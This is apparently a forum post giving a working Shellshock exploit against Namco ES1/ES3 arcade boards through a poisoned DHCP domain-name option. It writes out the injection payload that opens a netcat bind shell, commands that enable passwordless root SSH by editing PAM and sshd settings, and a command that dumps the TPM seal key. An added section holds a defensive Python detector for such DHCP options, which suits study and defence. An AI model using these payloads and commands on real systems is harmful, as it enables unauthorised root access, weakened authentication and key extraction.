It was a rainy evening in Finland and I had just gotten this PCB; a friend and I were brainstorming various ways to get in. We tried almost all known tricks and Linux tricks but nothing worked.
That is, until my friend Mr. xxx woke me up in the morning telling me he owned it. Of course I was like "sure man", plz tell me more. But he really did figure this out in less than 24 hours.
Come on man, cut to the chase:
Here are the details for the Linux (not Windows, even though I have that exploited too) version of the ES1/ES3 exploit.
With this method you can "remarry" a new HDD to the system, repair broken systems to replace parts, or even change game files yourself.
Remarrying and the other stuff I can write about later. But now, on to the exploit.
Not intended for piracy purposes!
NOTE:
UNDER NO CIRCUMSTANCES SHOULD YOU CONNECT ES1 HDD TO WINDOWS PC, IT WILL BRICK.
Use a standalone USB dock with 2 SATA connectors to clone it, then use the cloned HDD to dump the games; use a Linux machine if you want to change the original HDD itself.
If you have connected the HDD to a Windows PC, DO NOT BOOT IT ON THE PCB OR IT WILL SUICIDE!!!
Known games:
- Tank Tank Tank
- Dead Heat
- Dead Heat Riders
- Nirin
Requirements:
- some Linux knowledge (although also possible with Windows, Linux is far easier)
- ES1/ES3 motherboard with Linux
- Network cable
- VM or dedicated Linux machine.
Steps:
1. Install dhcpd on the Linux machine (disable any other DHCP server on the network, for example the one on your router)
2. Edit/add in the dhcpd config (you can limit the DHCP lease to the ES1 machine's MAC too if you want to be safe):
option domain-name "() { :;}; /bin/nc -lp23 -c/bin/sh&";
3. Put this in a new local file:
sed -i 's/nullok_secure$/nullok/' /etc/pam.d/common-auth
sed -i 's/.*PermitEmptyPasswords.*/PermitEmptyPasswords yes/' /etc/ssh/sshd_config
/etc/init.d/ssh restart
4. Connect RJ45 cable to ES1 and your PC
5. Boot the system. Once it's pingable,
cat <thatfile> | nc -q1 <192.168.X.X> 23
6. Profit: log in as root via PuTTY/ssh or similar without a password. 8)
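Defender-side note on what step 2 actually relies on: the ES1's DHCP client hands the domain-name option to a bash hook as an environment variable, and an unpatched bash (Shellshock) executes anything after the "() {" function prefix. The following is an added example, not part of the original post, that parses the options area of a DHCP message and flags string options carrying that prefix, which is the pattern an IDS or a packet capture review would look for; the sample packets are constructed for this example.

```python
import re

DHCP_MAGIC = b"\x63\x82\x53\x63"
# RFC 2132 options that dhclient hooks commonly export as shell variables
STRING_OPTIONS = {12: "host-name", 15: "domain-name", 17: "root-path", 67: "bootfile-name"}
SHELLSHOCK_RE = re.compile(rb"\(\)\s*\{")   # bash exported-function prefix "() {"


def parse_dhcp_options(options: bytes) -> dict:
    """Return {code: value} for the TLV options that follow the magic cookie."""
    if not options.startswith(DHCP_MAGIC):
        raise ValueError("missing DHCP magic cookie")
    i, parsed = len(DHCP_MAGIC), {}
    while i < len(options):
        code = options[i]
        if code == 0:            # PAD: single byte, no length
            i += 1
            continue
        if code == 255:          # END
            break
        if i + 1 >= len(options):
            raise ValueError("truncated option header")
        length = options[i + 1]
        value = options[i + 2:i + 2 + length]
        if len(value) != length:
            raise ValueError("truncated option value")
        parsed[code] = value
        i += 2 + length
    return parsed


def find_shellshock_options(options: bytes) -> list:
    """Names of string options whose value starts a bash function definition."""
    return [STRING_OPTIONS[c] for c, v in parse_dhcp_options(options).items()
            if c in STRING_OPTIONS and SHELLSHOCK_RE.search(v)]


def _opt(code: int, value: bytes) -> bytes:
    """Encode one type-length-value option."""
    return bytes([code, len(value)]) + value


# Constructed samples: a normal DHCPOFFER domain-name and an injected one.
BENIGN = DHCP_MAGIC + _opt(53, b"\x02") + _opt(15, b"arcade.local") + b"\xff"
MALICIOUS = DHCP_MAGIC + _opt(53, b"\x02") + _opt(15, b"() { :;}; echo vulnerable") + b"\xff"

if __name__ == "__main__":
    print(find_shellshock_options(BENIGN))      # []
    print(find_shellshock_options(MALICIOUS))   # ['domain-name']
```

The same check applies to any free-form DHCP string option, since every one of them reaches the hook script the same way.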
Proper explanation of the exploit:
http://blog.trendmicro.com/trendlabs-se ... -via-dhcp/
Note:
- On some systems you have only about a 10 second window to execute the exploit, because they shut down all network connections. You need to connect quickly and dump the TPM key with the command below (needed to mount the HDD on another Linux machine; see the note above!!!)
arcadeunsealkey /etc/arcade/sealkey
Credits:
- android for the PCB
- Mr. xxx who didn't want his real name/nick revealed.
Exploit was found on: 11th of June, 2015

Enjoy
